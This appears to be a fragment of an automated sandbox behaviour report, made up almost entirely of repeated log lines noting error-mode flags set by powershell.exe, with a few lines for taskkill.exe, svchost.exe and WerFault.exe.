Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
